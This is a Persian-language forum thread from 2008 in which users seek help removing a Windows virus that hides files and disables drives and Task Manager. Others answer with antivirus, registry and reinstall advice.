با سلام خدمت مدیر تاپیک و دوستان عزیز .من چند وقتی هستش که سیستمم به ویروسی مبتلا شده .اولا درایو ها رو باز نمیکنه و باید با راست کلیک بازش کنم.و فلاپی درایو را هم به صدا انداخته.میگن این ویروس روی شیارهای هارد میشینه .حالا شیار هارد کجاست نمیدونم.کاسپر اونو نشناخت.فایل ویروس را برای یکی از بچه های انجمن فرستادم .اون هم عکسی که نشان میداد کاسپر اون را گرفته برام فرستاد.توی up date کردن کاسبر روی 22%قطع میشد که یکی از بچه های انجمن گفت کارت اینترنتت را عوض کن .منم همین کار را کردم .و از 22%رد کرد .حالا وقتی به 50% میرسه پیغام ریاستارد میده .خلاصه کامل update نمیشه.وقتی ویروس را دیلیت میکنم کمتر از 1 ثانیه دوباره میسازه. nod 32 را نصب و update کردم .روی درایو هام یه فالی را شناسای میکنه که اخرش نوشته eror open ولی وقتی دستور scan &clean را میزتم اونو پاک نمیکنه .

دارم دیوانه میشم.

کمک کنید .خواهش میکنم

winxp
14-01-2008, 01:33
عزیز دلم

بهترین کار برای شما اینه که ویندوز رو عوض کنین و قبل از هر کاری , حتی رفتن به my computer

برین فایل مخفیتون رو show کنین , حتی فایلهای super hidden رو , بعد برین تک تک درایوهاتون راست کلیک open و اونجا هر چش فایل ناشناخته بود که شما نمیدونستین ماله چی هستش رو پاک کنین

موفق باشی عزیزم

senator mj
15-01-2008, 09:09
سلام win xp عزیز .من قبلا راه حل شما را امتحان کردم جواب نداد.خوشبختانه کامل update شد .منم قدرت scanرا ماکزیمم گذاشتم و ویروس را ÷اکش کردم
امیدوارم سربلند و پاینده باشید

Hadi King
16-01-2008, 00:29
آنتی ویروسش هم از لینک زیر می تونید دانلود کنید


حجم : 17.4KB
کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


این انتی ویروس فایل های مخفی رو برمیگردونه اجرا شده......دیگه نمی خواد اون همه کار کنی:5:

sid
19-01-2008, 18:30
اقا این نرم افزار کوچولوه پسوندش خیلی عجیبه سیستم من نمیشناسش
دوم اینکه یکی گفتش مثل اینکه بعد از هر بار بالا اومدن ویندوز مجددا اجرا میشه
من چیکار کنم
هنوز فایل هام مخفیه
از نرم افزار kill newfolder هم استفاده کردم که یکی از بچه های برنامه نویس سایت نوشتتش

یه جایی میشه فایل exe رو اپ کنید

Hadi King
20-01-2008, 15:59
یه جایی میشه فایل exe رو اپ کنید
بیا اینم جای دیگه آپلود کردم..........امتحان کردم 100% جواب داد

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

arash_3tar
20-01-2008, 18:15
سلام
سيستم من هم گرفتاره اين ويروس شده
تاپيك رو خوندم و خواستم پاكش كنم كه فهميدم
پنجره ي task manager اصلا باز نميشه
راهنمايي كنيد چه كار كنم

winxp
20-01-2008, 18:50
سلام
سيستم من هم گرفتاره اين ويروس شده
تاپيك رو خوندم و خواستم پاكش كنم كه فهميدم
پنجره ي task manager اصلا باز نميشه
راهنمايي كنيد چه كار كنم


سلام عزیزم

این عبارت رو توی ران copy past کن و enter رو بزن ببین حل میشه

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

موفق باشی عزیزم :11:

arash_3tar
21-01-2008, 00:14
winxp با مرام نشد
توي safe mode هم زدم نشد
سيستم من هم ويروس اين تاپيك رو داره هم اون kazme gheyz روو
فكر كنم دست به يكي كردن
سيستم من رو نابود كنند

sid
21-01-2008, 20:26
[QUOTE=H.VIKE;2018525]بیا اینم جای دیگه آپلود کردم..........امتحان کردم 100% جواب داد

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید[/QUO

mer30

ly.comeng
12-04-2008, 21:34
سلام به همه دوستان

من بیچاره یه عمره که tem2.exe دارم فکر میکردم ارور سیستمیه،امروز که ویندوز عوض کردم دیدم بازم با بالا اومدن سیستمم اجرا میشه سرچ کردم فهمیدم جریان چیه!!!!!
حالا یه برنامه به نام PRT و یکی دیگه به نام PREVXCSIFREE دانلود کردم و با اونا پاک شدن،البته یک بار یکی دیگه اومد سراغم به نام copy.exe که درایو هام باز نمیشدن،بگذریم الان انگار دیگه نیستن؟! اما میخوام ببینم بازم میان؟یا به عبارتی از کجا میتونم 100% مطمئن بشم که پاک شدن؟؟؟

یک مشکل دیگه که قبل از اینکه بفهمم اینا ویروس هستن داشتم این بود که Cd drive لپ تاپم یه دفعه در حین کار که سی دی داخلش بود می پرید بیرون میخوام بپرسم که این مشکل بابت ویروس هاست؟


ممنون میشم راهنماییم کنین:20:

mahdi7610
12-04-2008, 22:00
سلام به همه دوستان

من بیچاره یه عمره که tem2.exe دارم فکر میکردم ارور سیستمیه،امروز که ویندوز عوض کردم دیدم بازم با بالا اومدن سیستمم اجرا میشه سرچ کردم فهمیدم جریان چیه!!!!!
حالا یه برنامه به نام PRT و یکی دیگه به نام PREVXCSIFREE دانلود کردم و با اونا پاک شدن،البته یک بار یکی دیگه اومد سراغم به نام copy.exe که درایو هام باز نمیشدن،بگذریم الان انگار دیگه نیستن؟! اما میخوام ببینم بازم میان؟یا به عبارتی از کجا میتونم 100% مطمئن بشم که پاک شدن؟؟؟

یک مشکل دیگه که قبل از اینکه بفهمم اینا ویروس هستن داشتم این بود که Cd drive لپ تاپم یه دفعه در حین کار که سی دی داخلش بود می پرید بیرون میخوام بپرسم که این مشکل بابت ویروس هاست؟


ممنون میشم راهنماییم کنین:20:
سلام دوست عزیز
به ادرس زیر سر بزنید می تونید اطلاعاتی در مورد ویروس copy.exe بگیرید .

کامل ترين تايپک براي از بين بردن ويروس Show Hidden Files ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

موفق باشید .

Farahmand Farshidy
13-04-2008, 00:34
سلام دوست عزیز!


یک مشکل دیگه که قبل از اینکه بفهمم اینا ویروس هستن داشتم این بود که Cd drive لپ تاپم یه دفعه در حین کار که سی دی داخلش بود می پرید بیرون میخوام بپرسم که این مشکل بابت ویروس هاست؟

در رابطه به باز شدن CDِ Drive لپ تاب شما باید بگم که امکان داره یه برنامه مخرب اونو Eject کنه اما این امکان خیلی کمه.

فکر کنم چرخ و اون گیرا های درب لپ تاب شما سست شده اند و این باعث بیرون اومدنش میشه.

مؤفق باشید!
فرهمنــــــــد

winxp
13-04-2008, 15:13
سلام یه همه ی عزیزان

ازین به بعد به تاپیک مهدی جان مراجعه کنین

ممنون و متشکر از شما

فعلا